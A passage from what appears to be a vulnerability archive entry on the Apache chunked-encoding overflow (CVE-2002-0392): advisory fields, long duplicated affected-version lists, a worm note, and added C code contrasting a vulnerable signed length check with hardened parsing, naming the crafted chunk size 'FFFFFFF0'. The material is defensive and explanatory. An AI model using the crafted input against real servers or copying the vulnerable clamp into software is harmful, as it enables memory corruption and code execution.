=eZeq 
-----END PGP SIGNATURE----- 
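The length computation the ISS hunk tries to repair, and the negative chunk length the Apache advisory describes, as an added example that is not code from Apache, ISS or the Metasploit module above: the pre-patch shape of the check, a hardened version that refuses negative lengths and clamps with an unsigned comparison, and a chunk-size line parser that rejects a size such as `FFFFFFF0` before it can ever be stored in a signed 32-bit integer. `CHUNK_BUFSIZ`, `CHUNK_SIZE_LIMIT` and every function name are assumptions made for this example, and the chunk-size lines it feeds itself are constructed.

```c
#include <stddef.h>
#include <stdio.h>

/* Constructed values for this example (not Apache's own constants). */
#define CHUNK_BUFSIZ     8192           /* size of the receive buffer */
#define CHUNK_SIZE_LIMIT 0x7fffffffL    /* largest chunk size we will accept */

/* Pre-patch shape of the length computation: 'remaining' is signed, so a
 * chunk size that arrived as a negative number is never clamped, and the
 * caller would go on to read (size_t)-16 bytes into an 8 KiB buffer. */
long len_to_read_vulnerable(long remaining, int bufsiz)
{
    return (remaining > bufsiz) ? bufsiz : remaining;
}

/* Hardened form: a negative length is a protocol error, and the clamp is an
 * unsigned comparison so no sign trick can slip past it. */
long len_to_read_hardened(long remaining, size_t bufsiz)
{
    if (remaining < 0)
        return -1;                          /* caller must abort the request */
    return ((size_t)remaining > bufsiz) ? (long)bufsiz : remaining;
}

/* Parse a chunk-size line ("1a3f", optionally followed by whitespace, a
 * ";ext" chunk extension and CRLF).  Returns 0 and stores the size, or -1
 * for anything malformed, oversized, or that would not fit in a
 * non-negative 32-bit value. */
int parse_chunk_size(const char *line, long *out)
{
    unsigned long value = 0;
    int ndigits = 0;
    const char *p;

    for (p = line; *p != '\0'; p++) {
        int d;
        if (*p >= '0' && *p <= '9')       d = *p - '0';
        else if (*p >= 'a' && *p <= 'f')  d = *p - 'a' + 10;
        else if (*p >= 'A' && *p <= 'F')  d = *p - 'A' + 10;
        else                              break;
        if (++ndigits > 8)                /* more than 32 bits of size */
            return -1;
        value = (value << 4) | (unsigned long)d;
    }
    if (ndigits == 0)
        return -1;                        /* no hex digits at all */

    /* Only optional whitespace, a chunk extension or the line end may follow. */
    while (*p == ' ' || *p == '\t')
        p++;
    if (*p != '\0' && *p != ';' && *p != '\r' && *p != '\n')
        return -1;

    if (value > (unsigned long)CHUNK_SIZE_LIMIT)
        return -1;                        /* would be negative as a signed int */
    *out = (long)value;
    return 0;
}

/* Convenience wrapper: the parsed size, or -1 if the line was rejected. */
long chunk_size_of(const char *line)
{
    long size;
    return parse_chunk_size(line, &size) == 0 ? size : -1;
}

/* Full path for one chunk: parse the size line, then decide how many bytes
 * to read into a CHUNK_BUFSIZ buffer.  Returns the byte count, or -1 if the
 * request must be rejected. */
long plan_chunk_read(const char *size_line)
{
    long size = chunk_size_of(size_line);
    if (size < 0)
        return -1;
    return len_to_read_hardened(size, CHUNK_BUFSIZ);
}

int main(void)
{
    /* Constructed chunk-size lines: a normal one, and the value the module
     * above sends, which is -16 when stored in a signed 32-bit integer. */
    const char *lines[] = { "1a3f;ext=1\r\n", "FFFFFFF0 \r\n" };
    size_t i;

    for (i = 0; i < sizeof lines / sizeof lines[0]; i++)
        printf("%-12.8s -> %ld\n", lines[i], plan_chunk_read(lines[i]));

    /* The pre-patch computation, fed the same value as a signed number. */
    printf("vulnerable(-16, %d) -> %ld\n", CHUNK_BUFSIZ,
           len_to_read_vulnerable(-16L, CHUNK_BUFSIZ));
    return 0;
}
```

The parser caps the size at eight hex digits and at `CHUNK_SIZE_LIMIT` so that the value can never become negative when it is later held in a signed 32-bit integer; anything past that is refused at parse time, which is the point the review of the ISS hunk makes: the rejection has to happen before the length reaches the copy loop, not inside the comparison that sizes the copy.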
    

- Vulnerability information (F26278)

apache_1.3.26.tar.gz (PacketStormID:F26278)
2002-06-19 00:00:00
 
unix
CVE-2002-0392

Apache is the most popular webserver on the Internet, quite possibly the best in terms of security, functionality, efficiency, and speed. Changelog available here.

- Vulnerability information

OSVDB ID: 838
Title: Apache HTTP Server Chunked Encoding Remote Overflow
Location: Remote / Network Access
Attack type: Input Manipulation
Impact: Loss of Integrity
Solution: Upgrade
Exploit: Public, Commercial
Disclosure: Vendor Verified

- Vulnerability description

Apache Web Server contains a flaw that allows a remote attacker to execute arbitrary code. The issue is due to the mechanism that calculates the size of "chunked" encoding not properly interpreting the buffer size of data being transferred. By sending a specially crafted chunk of data, an attacker can possibly execute arbitrary code or crash the server.

- Timeline

2002-06-19 Unknown
Unknown Unknown

- Solution

Upgrade to version 1.3.26, 2.0.39 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Title: Apache Chunked-Encoding Memory Corruption Vulnerability
Class: Boundary Condition Error
Bugtraq ID: 5033
Remote: Yes
Local: No
Published: 2002-06-17 12:00:00
Updated: 2008-01-11 11:09:00
Credit: Discovered independently by Neel Mehta of ISS X-Force and Mark Litchfield of Next Generation Security Software.

- Affected software versions

RedHat Secure Web Server 3.2 i386
Oracle Oracle HTTP Server for Apps only 1.0.2 .1s
Oracle Oracle HTTP Server 9.2 .0
+ Apache Software Foundation Apache 1.3.22
Oracle Oracle HTTP Server 9.1
+ Apache Software Foundation Apache 1.3.12
Oracle Oracle HTTP Server 9.0.2
Oracle Oracle HTTP Server 9.0.1
Oracle Oracle HTTP Server 8.1.7
+ Apache Software Foundation Apache 1.3.12
+ Oracle Oracle8 8.1.7
+ Oracle Oracle8i Enterprise Edition 8.1.7 .0.0
+ Oracle Oracle8i Standard Edition 8.1.7
Oracle Oracle HTTP Server 1.0.2 .2 Roll up 2
Oracle Oracle HTTP Server 1.0.2 .2
Oracle Oracle HTTP Server 1.0.2 .1
Oracle Oracle HTTP Server 1.0.2 .0
Macromedia JRun 4.0
- Microsoft IIS 5.1
- Microsoft IIS 5.0
- Microsoft IIS 4.0
Macromedia ColdFusion Server MX Professional
Macromedia ColdFusion Server MX Enterprise
Macromedia ColdFusion Server MX Developer
IBM HTTP Server 1.3.19
- HP HP-UX 11.0
- IBM AIX 4.3.3
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- RedHat Linux 7.1
- S.u.S.E. Linux 7.1
- Sun Solaris 7.0
- Sun Solaris 2.6
HP VirtualVault 4.6
- HP HP-UX 11.0 4
HP VirtualVault 4.5
- HP HP-UX 11.0 4
HP Tru64 UNIX INTERNET EXPRESS 5.9
HP Tru64 UNIX Compaq Secure Web Server 5.8.2
HP Tru64 UNIX Compaq Secure Web Server 5.8.1
HP OpenView Service Information Portal 3.0
HP OpenView Service Information Portal 2.0
HP OpenView Service Information Portal 1.0
HP OpenView Network Node Manager 6.31
HP OpenView Network Node Manager 6.10
- HP HP-UX 11.0
- HP HP-UX 10.20
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Professional SP3
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
HP OpenView Network Node Manager 6.2
HP OpenView Network Node Manager 6.1
HP INTERNET EXPRESS EAK 2.0
HP HP-UX (VVOS) 11.0 4
HP HP-UX 11.22
HP HP-UX 11.20
HP HP-UX 11.11
HP HP-UX 11.0 4
HP HP-UX 11.0
HP Compaq Secure Web Server for OpenVMS 1.2
HP Compaq Secure Web Server for OpenVMS 1.1 -1
HP Compaq Secure Web Server for OpenVMS 1.0 -1
Apache Software Foundation Apache 2.0.39
Apache Software Foundation Apache 2.0.38
Apache Software Foundation Apache 2.0.37
Apache Software Foundation Apache 2.0.36
Apache Software Foundation Apache 2.0.35
Apache Software Foundation Apache 2.0.32
Apache Software Foundation Apache 2.0.28
Apache Software Foundation Apache 2.0
Apache Software Foundation Apache 1.3.24
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 alpha
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
- Microsoft Windows XP Professional
Apache Software Foundation Apache 1.3.24
+ OpenBSD OpenBSD 3.1
+ Oracle Oracle HTTP Server 9.2 .0
+ Oracle Oracle HTTP Server 9.0.1
+ Oracle Oracle9i Application Server 9.0.2
+ Oracle Oracle9i Application Server 1.0.2 .2
+ Oracle Oracle9i Application Server 1.0.2 .1s
+ Oracle Oracle9i Application Server 1.0.2
+ Slackware Linux 8.1
+ Unisphere Networks SDX-300 2.0.3
Apache Software Foundation Apache 1.3.23
- IBM AIX 4.3
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0
+ Trustix Secure Linux 1.5
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.1
Apache Software Foundation Apache 1.3.23
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
- Microsoft Windows XP Professional
Apache Software Foundation Apache 1.3.22
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
+ Microsoft Windows 95
+ Microsoft Windows 98
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Apache Software Foundation Apache 1.3.22
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ MandrakeSoft Corporate Server 1.0.1
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 7.2
+ OpenPKG OpenPKG 1.0
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
Apache Software Foundation Apache 1.3.20
- HP HP-UX 11.22
- HP HP-UX 11.20
+ MandrakeSoft Single Network Firewall 7.2
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3
+ SGI IRIX 6.5.18
+ SGI IRIX 6.5.17
+ SGI IRIX 6.5.16
+ SGI IRIX 6.5.15
+ SGI IRIX 6.5.14 m
+ SGI IRIX 6.5.14 f
+ SGI IRIX 6.5.14
+ SGI IRIX 6.5.13 m
+ SGI IRIX 6.5.13 f
+ SGI IRIX 6.5.13
+ SGI IRIX 6.5.12 m
+ SGI IRIX 6.5.12 f
+ SGI IRIX 6.5.12
+ Slackware Linux 8.0
+ Sun Cobalt Control Station 4100CS
+ Sun Cobalt RaQ 550
+ Sun Solaris 9_x86 Update 2
+ Sun Solaris 9_x86
+ Sun Solaris 9
+ Sun SunOS 5.9 _x86
+ Sun SunOS 5.9
Apache Software Foundation Apache 1.3.20
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
Apache Software Foundation Apache 1.3.19
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
Apache Software Foundation Apache 1.3.19
- Apple Mac OS X 10.0.3
- Caldera OpenLinux 2.4
+ Debian Linux 2.3
- Digital (Compaq) TRU64/DIGITAL UNIX 5.0
- Digital (Compaq) TRU64/DIGITAL UNIX 4.0 g
- Digital (Compaq) TRU64/DIGITAL UNIX 4.0 f
+ EnGarde Secure Linux 1.0.1
- FreeBSD FreeBSD 4.2
- FreeBSD FreeBSD 3.5.1
- HP HP-UX 11.11
- HP HP-UX 11.0 4
- HP HP-UX 11.0
- HP HP-UX 10.20
+ HP Secure OS software for Linux 1.0
- HP VirtualVault 4.5
+ Mandriva Linux Mandrake 8.1
- Mandriva Linux Mandrake 8.0
- Mandriva Linux Mandrake 7.2
- Mandriva Linux Mandrake 7.1
- NetBSD NetBSD 1.5.1
- NetBSD NetBSD 1.5
+ OpenBSD OpenBSD 2.9
- OpenBSD OpenBSD 2.8
+ OpenBSD OpenBSD 3.0
- Red Hat Linux 6.2
- RedHat Linux 7.1
- RedHat Linux 7.0
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.0 sparc
+ S.u.S.E. Linux 7.0 ppc
+ S.u.S.E. Linux 7.0 i386
+ S.u.S.E. Linux 7.0 alpha
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 6.4 ppc
+ S.u.S.E. Linux 6.4 i386
+ S.u.S.E. Linux 6.4 alpha
+ S.u.S.E. Linux 6.4
- SCO eDesktop 2.4
- SCO eServer 2.3.1
- SGI IRIX 6.5.9
- SGI IRIX 6.5.8
- Sun Solaris 8_sparc
- Sun Solaris 7.0
Apache Software Foundation Apache 1.3.18
+ Apache Software Foundation Apache 1.1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
Apache Software Foundation Apache 1.3.18
Apache Software Foundation Apache 1.3.17
+ MandrakeSoft Corporate Server 1.0.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ OpenBSD OpenBSD 2.8
+ S.u.S.E. Linux 7.1
Apache Software Foundation Apache 1.3.17
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1

- Unaffected program versions

HP Tru64 UNIX Compaq Secure Web Server 5.9.1
Apache Software Foundation Apache 2.0.39
Apache Software Foundation Apache 1.3.26
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ Mandriva Linux Mandrake 9.0
+ OpenPKG OpenPKG 1.1
+ Trustix Secure Linux 1.5
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.1
Apache Software Foundation Apache 1.3.26
Apache Software Foundation Apache 1.3.25
Apache Software Foundation Apache 1.3.25

- Vulnerability discussion

When processing requests coded with the 'Chunked Encoding' mechanism, Apache fails to properly calculate required buffer sizes. This is believed to be due to improper (signed) interpretation of an unsigned integer value. Consequently, several conditions that have security implications may occur. Reportedly, a buffer overrun and signal race condition occur. Exploiting these conditions may allow arbitrary code to run.

**Update**: Reportedly, at least one worm is exploiting this vulnerability to propagate in the wild. The worm targets FreeBSD 4.5 systems running Apache 1.3.22-24 and 1.3.20. Other versions may also be affected.
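The defect described above comes down to a signed length being compared against a buffer size and then handed to a copy routine that takes an unsigned size. The following is an added, constructed illustration (not Apache's source): the "vulnerable" path models the signed chunk length and signed clamp the discussion describes, with `strtol` standing in for the server's own hex parser (an assumption), and the hardened path parses the chunk-size line as unsigned, rejects a sign or an overflowing value, and clamps with an unsigned comparison. `CHUNK_BUF_SIZE` and the sample chunk-size lines are constructed values.

```c
/*
 * Added illustration of the chunk-size length-check defect described above.
 * Constructed example, not Apache's source code.
 */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

#define CHUNK_BUF_SIZE 8192u  /* fixed-size chunk buffer (constructed value) */

/* Vulnerable-style parse: the hex chunk size is read into a signed long, so a
 * leading '-' is accepted and yields a negative length. (strtol stands in for
 * the server's own parser here; this is an assumption of the example.) */
long chunk_len_signed(const char *line)
{
    return strtol(line, NULL, 16);
}

/* Vulnerable-style clamp: a signed comparison, after which the result goes to
 * a copy routine taking size_t. A negative length compares "smaller" than the
 * buffer, passes the clamp, and converts to a huge size_t (SIZE_MAX for -1). */
size_t clamp_len_signed(long chunk_len, size_t bufsize)
{
    long n = chunk_len > (long)bufsize ? (long)bufsize : chunk_len;
    return (size_t)n;
}

/* Hardened parse of a chunk-size line: hex digits only, no sign, overflow
 * detected, and nothing but a chunk extension (';...') or the line terminator
 * allowed afterwards. Returns 0 and sets *out on success, -1 if the line must
 * be rejected as malformed. */
int parse_chunk_size(const char *line, size_t *out)
{
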